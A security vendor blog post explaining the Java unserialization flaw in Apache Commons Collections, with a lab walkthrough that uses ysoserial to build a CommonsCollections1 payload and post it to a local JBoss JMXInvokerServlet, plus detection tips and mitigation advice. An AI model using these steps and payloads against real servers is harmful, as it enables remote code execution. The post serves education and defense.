Menu Icon
< back to main
 • 3 min read

The Forgotten Unserialization Vulnerability

The Forgotten Unserialization Vulnerability
Sasi Levi
Sasi Levi

Sasi Levi works as a senior cybersecurity researcher at Salt Security. Through his time in the cybersecurity sector, Sasi helped companies such as ConteXtream and Magic Leap develop and secure their applications.

Want to see the platform in action?
get a demoArrow Right
Want to see the platform in action?
get a demoArrow Right

forgottenVulnerability 1

There’re lots of vulnerabilities out there, but I think the most important one has been forgotten. Compared to Imagetragick, the “Unserialize vulnerability” got forgotten as fast as it was published. On November, 6th 2015, I first read about it when foxglovesecurity published research they had done, and since then I heard about a real attack on Paypal servers.

In this blog post, I’ll focus on Java and I’ll use JBoss application server on my demo. JBoss is an application server that contains many containers such as, WEB Container, EE/EJB Container, etc. It’s a web container based on a Tomcat server, but its completely different from Tomcat, read more about JBoss.

What’s serialization and deserialization

Serialization is about streaming data to disk or over the network, so if you send a request, then the process of converting will do serialization, and when the process read the data back it will do deserialization. Class ObjectInputStream and class ObjectOutputStream both handle serialization and deserialization. Example:

public static Object deserialize(String fileName) throws IOException, ClassNotFoundException { FileInputStream fis = new FileInputStream(fileName); BufferedInputStream bis = new BufferedInputStream(fis); ObjectInputStream ois = new ObjectInputStream(bis); Object obj = ois.readObject(); ois.close(); return obj; } public static void serialize(Object obj, String fileName) throws IOException { FileOutputStream fos = new FileOutputStream(fileName); BufferedOutputStream bos = new BufferedOutputStream(fos); ObjectOutputStream oos = new ObjectOutputStream(bos); oos.writeObject(obj); oos.close(); }

Am I vulnerable too?

Simple check will show you if you vulnerable or not:

~/jboss-4.2.3.GA# grep -R InvokerTransformer .

Well results:

Binaryfile./server/all/lib/commons-collections.jarmatches Binaryfile./server/default/lib/commons-collections.jarmatches

Also, you should run the same command on your development environment and see if you’re using common or not. (95% you are :)).

How to detect Java serialized object

Here’s an example of raw byte data of a serialization Java object: AC ED 00 05 73 72 00 0A 53 65 72 69 61 6C 54 65 73 74 05 52 81 5A AC 66 02 F6 02 00 02 49 00 07 As you can see I emphasis AC ED 00 05 which points out that this is a Java serialized object (Sometimes you’ll see Java classes in the request like artsploit finding).

How to exploit it, PoC example (Ubuntu-Jboss)

First, you need to download Jboss 4.2.3. Second, you need to download ysoserial’s tool, which helps us to generate unsafe object deserialization.

After Jboss download run the following command:

Unzip JBoss

unzip jboss-4.2.3.GA.zip

Detect your local ip

ifconfig and copy the private it, e.g. 192.168.231.132

Start Jboss

./run.sh -b 192.168.231.132

Verify Jboss has started

[Server] JBoss (MX MicroKernel) [4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)] Started in 5s:467ms

Clone ysoserial’s tool with git

git command

git clone [https://github.com/frohoff/ysoserial.git](https://github.com/frohoff/ysoserial.git)

Compile and build ysoserial

mvn clean install

Create our payload.

~/ysoserial $ java -jar target/ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections1 'touch /tmp/RCE_vuln.txt' > payload.out

Run burp-suite and make capture the request and send it to repeater

http://192.168.231.132:8080/invoker/JMXInvokerServlet

Upload the payload to burp suite — repeater

On repeater change the GET to POST, **then** right click and upload the payload from a file

Check the machine where Jboss installed

ls /tmp/ and you'll see RCE_vuln.txt

Conclusion

As you can see, you need to verify that the website is vulnerable to common-collection and then you should act and create payload. The following image present the state on my machine after the attack succeeded.

forgottenVulnerability 2Burp-suite and server side.

Mitigations

Any application server should upgrade the commons-collections. E.g. Collections-580 or JBoss

References

  1. https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/#background

  2. https://access.redhat.com/solutions/2045023

  3. https://github.com/frohoff/ysoserial

  4. https://www.paypal-engineering.com/2016/01/21/lessons-learned-from-the-java-deserialization-bug/

  5. https://en.wikipedia.org/wiki/Web_container

  6. http://docs.oracle.com/javaee/6/tutorial/doc/bnabo.html

  7. https://en.wikipedia.org/wiki/JBoss_Enterprise_Application_Platform

  8. https://sourceforge.net/projects/jboss/files/JBoss/JBoss-4.2.3.GA/jboss-4.2.3.GA.zip/download

  9. https://issues.apache.org/jira/browse/COLLECTIONS-580

  10. https://access.redhat.com/solutions/2045023

Related Stories

Cybersecurity Statistics for 2021
Cybersecurity Statistics for 2021
What's new in ransomware, social engineering, and many other security threats
Read moreArrow Right
The State of Pentesting 2021: Common Vulnerabilities, Findings, and Why Teams Struggle With Remediation
The State of Pentesting 2021: Common Vulnerabilities, Findings, and Why Teams Struggle With Remediation
Each year, we publish The State of Pentesting report to provide a detailed overview of vulnerabilities and identify the trends and hazards that impact the cybersecurity community.
Read moreArrow Right
How to Build Resilience in Cybersecurity: 4 Lessons Learned From Military Experience
How to Build Resilience in Cybersecurity: 4 Lessons Learned From Military Experience
What better group to turn to for advice than security leaders who have worked on the front lines of risk and uncertainty?
Read moreArrow Right
New Ebook: Beginner’s Guide to Compliance-Driven Pentesting
New Ebook: Beginner’s Guide to Compliance-Driven Pentesting
Find out more about the role of pentesting in your company’s compliance effort.
Read moreArrow Right

Never miss a story

Stay updated about Cobalt news as it happens